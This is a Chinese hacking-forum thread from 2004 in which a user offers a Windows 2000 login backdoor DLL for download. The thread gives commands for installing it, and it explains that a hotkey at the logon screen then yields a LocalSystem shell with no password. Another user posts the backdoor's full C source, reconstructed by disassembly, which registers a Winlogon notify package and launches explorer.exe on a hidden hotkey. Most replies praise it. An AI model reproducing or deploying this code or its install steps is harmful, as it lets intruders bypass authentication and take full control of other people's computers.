|
 | 作者: tabris17 [tabris17]
 论坛用户 |
登录 |
| 在目标系统上安装,就可以不用密码进行本地登陆 下载 http://www.20cn.net/~tabris17/download/backdoor.dll 安装方法: 运行:rundll32.exe [Dll Filename] Install eg:rundll32.exe c:\backdoor.dll Install 安装需要有对注册表的 HKEY_LOCAL_MACHINE 有写权限。 安装完后,以后只要在登陆界面出现后,按下"Ctrl+G"就能进系统了,而且是LocalSystem权限哦 |
| 地主 发表时间: 04-01-13 18:46 |
 | 回复: NetDemon [netdemon]  ADMIN |
登录 |
 |
| B1层 发表时间: 04-01-14 17:56 |
 | 回复: yaochi [yaochi] 论坛用户 |
登录 |
永远支持上帝,你这个四不象的东西,哈哈 |
| B2层 发表时间: 04-01-14 20:30 |
 | 回复: 286 [unique]  版主 |
登录 |
|
这么厉害? 如果不按CTRL+G,而是输入用户名和密码的话也正常吧? 厉害厉害。 |
| B3层 发表时间: 04-01-15 09:25 |
 | 回复: naotian [naotian]  论坛用户 |
登录 |
|
真是个好东西 HOHO |
| B4层 发表时间: 04-01-16 10:53 |
| 回复: tabris17 [tabris17] 论坛用户 |
登录 |
|
不按CTRL+G,输入用户名和密码的话也能正常登陆 要卸载的话,删除注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cindsrv 分枝, 删除%systemroot%\cindsrv.dll文件 就行了 |
| B5层 发表时间: 04-01-16 15:49 |
 | 回复: sinister [sinister]  论坛用户 |
登录 |
|
无意中看到这个小程序后,花了点时间对它反汇编。觉的思路还是挺巧妙的。其实做这 行,有时不见得要你对底层研究有多深,而更注重的是一些好的想法。这个小程序正好 说明了这点。 以下 C 代码是对 backdoor.dll 反汇编后写成的。程序中我按照自己的一些编程习惯 做了些调整。 //--------------------------------------------------------------------------- #include <windows.h> #include <Winwlx.h> #define PROGNAME "\\cindsrv.dll" #define WINSHELL "\\explorer.exe" #define HOTKEY_ID 925 HINSTANCE hInst = NULL; TCHAR szMiniKey[] = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\cindsrv"; __declspec(dllexport) VOID APIENTRY EventStartup (PWLX_NOTIFICATION_INFO pInfo); __declspec(dllexport) BOOL WINAPI Install(void); int APIENTRY CreateLogoOnWindow( HINSTANCE hInstance, int nCmdShow ); BOOL InitApplication(HANDLE hInstance); BOOL InitInstance( HANDLE hInstance,INT nCmdShow); LONG APIENTRY MainWndProc(HWND hWnd, UINT message, UINT wParam, LONG lParam); VOID WINAPI LoadShell(); BOOL WINAPI RegNotiPackage(); BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fwdreason, LPVOID lpvReserved) { switch (fwdreason) { case DLL_PROCESS_ATTACH: { hInst = hinstDLL; DisableThreadLibraryCalls (hinstDLL); } break; } return TRUE; } //--------------------------------------------------------------------------- int APIENTRY CreateLogoOnWindow( HINSTANCE hInstance, int nCmdShow ) { MSG msg; if (!InitApplication(hInstance)) return (FALSE); if (!InitInstance(hInstance, nCmdShow)) return (FALSE); while (GetMessage(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return (msg.wParam); } BOOL InitApplication(HANDLE hInstance) { WNDCLASS wc; wc.style = 0; wc.lpfnWndProc = (WNDPROC) MainWndProc; wc.cbClsExtra = 0; wc.cbWndExtra = 0; wc.hInstance = hInstance; wc.hIcon = LoadIcon(NULL, IDI_APPLICATION); wc.hCursor = LoadCursor(hInstance, IDC_ARROW); wc.hbrBackground = GetStockObject(WHITE_BRUSH); wc.lpszMenuName = "LogoOn"; wc.lpszClassName = "WinLogoOnWClass"; return (RegisterClass(&wc)); } BOOL InitInstance( HANDLE hInstance,INT nCmdShow) { HWND hWnd; hInst = hInstance; hWnd = CreateWindow( "WinLogoOnWClass", "WinLogoOn Application", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, hInstance, NULL ); if (!hWnd) return (FALSE); RegisterHotKey(hWnd, HOTKEY_ID, MOD_CONTROL|MOD_ALT, VK_RETURN); ShowWindow(hWnd, nCmdShow); UpdateWindow(hWnd); return (TRUE); } LONG APIENTRY MainWndProc(HWND hWnd, UINT message, UINT wParam, LONG lParam) { switch (message) { case WM_PAINT: break; case WM_HOTKEY: if (wParam == HOTKEY_ID) { LoadShell(); } break; case WM_DESTROY: UnregisterHotKey(hWnd, HOTKEY_ID); PostQuitMessage(0); break; default: return (DefWindowProc(hWnd, message, wParam, lParam)); } Sleep(50); return (0); } VOID WINAPI LoadShell() { PROCESS_INFORMATION pi = {0}; STARTUPINFO si = {0}; TCHAR szWinPath[MAX_PATH] = {0}; HDESK hDesk; GetWindowsDirectory(szWinPath, MAX_PATH); lstrcat(szWinPath, WINSHELL); si.cb = sizeof(STARTUPINFO); si.lpReserved = NULL; si.lpTitle = NULL; si.lpDesktop = "WinSta0\\Default"; si.dwX = si.dwY = si.dwXSize = si.dwYSize = 0L; si.dwFlags = 0; si.wShowWindow = SW_SHOW; si.lpReserved2 = NULL; si.cbReserved2 = 0; CreateProcess( NULL, szWinPath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi ); hDesk = OpenDesktop("Default", 0, TRUE, MAXIMUM_ALLOWED); SwitchDesktop(hDesk); } BOOL WINAPI RegNotiPackage() { HKEY hMiniKey; DWORD Disposition; int err; DWORD dwAsyn = 1; DWORD dwImpe = 1; TCHAR szDllName[] = "cindsrv.dll"; TCHAR szStartName[] = "EventStartup"; err = RegCreateKeyEx( HKEY_LOCAL_MACHINE, szMiniKey, 0, "", REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_READ, NULL, &hMiniKey, &Disposition); if (err) { return(FALSE); } err = RegSetValueEx(hMiniKey, "Asynchronous", 0, REG_DWORD, (LPBYTE)&dwAsyn, sizeof(dwAsyn)); err = RegSetValueEx(hMiniKey, "DllName", 0, REG_SZ, (LPBYTE)szDllName, sizeof(szDllName)); err = RegSetValueEx(hMiniKey, "Impersonate", 0, REG_DWORD, (LPBYTE)&dwImpe, sizeof(dwImpe)); err = RegSetValueEx(hMiniKey, "Startup", 0, REG_SZ, (LPBYTE)szStartName, sizeof(szStartName)); RegCloseKey(hMiniKey); return(err == 0); } BOOL WINAPI Install() { TCHAR szFilePath[MAX_PATH] = {0}; TCHAR szSysPath[MAX_PATH] = {0}; GetSystemDirectory(szSysPath, MAX_PATH); lstrcat(szSysPath, PROGNAME); GetModuleFileName((HMODULE)hInst, szFilePath, MAX_PATH); CopyFile(szFilePath, szSysPath, FALSE); if (RegNotiPackage()) return TRUE; else return FALSE; } DWORD WINAPI StartLogoThread(LPVOID lParam) { CreateLogoOnWindow(hInst, SW_HIDE); return TRUE; } VOID APIENTRY EventStartup (PWLX_NOTIFICATION_INFO pInfo) { HANDLE hThread; DWORD dwTid; hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)StartLogoThread, NULL, 0, &dwTid ); CloseHandle(hThread); } |
| B6层 发表时间: 04-01-18 04:25 |
| 回复: NetDemon [netdemon] ADMIN |
登录 |
|
病毒这家伙又失惊无神的冒了出来,吓俺一跳 |
| B7层 发表时间: 04-01-19 17:53 |
| 回复: tabris17 [tabris17] 论坛用户 |
登录 |
能博得大名鼎鼎的sinister来反汇编我的程序,真是我的无尚荣幸 |
| B8层 发表时间: 04-01-19 22:07 |
 | 回复: ricky [ricky] 版主 |
登录 |
|
好啊 |
| B9层 发表时间: 04-01-20 16:49 |
| 回复: sinister [sinister] 论坛用户 |
登录 |
|
四不象 [tabris17] 你客气了,在 xfocus 上还和你讨论过动态修改进程名的问题,那 METALLICA 就是我。 |
| B10层 发表时间: 04-01-22 21:10 |
| 回复: feifan [feifan] 论坛用户 |
登录 |
|
菜鸟请教四不象大虾,这是个在本地使用,不是在网络远程控制对方的后门,是吗? |
| B11层 发表时间: 04-02-12 21:32 |
| 回复: tuzi [tuzi] 版主 |
登录 |
|
不错不错 象4不象学习 呵呵 |
| B12层 发表时间: 04-02-13 10:31 |
 | 回复: newmyth21 [newmyth21] 论坛用户 |
登录 |
|
支持四不象 |
| B13层 发表时间: 04-02-13 12:10 |
 | 回复: raymondw [raymondw] 论坛用户 |
登录 |
|
说道怎么多好东西 先是程序 有是METALLICA 你也听吗? |
| B14层 发表时间: 04-02-13 23:30 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 原创软件
标题: [今天刚做]一个win2K的后门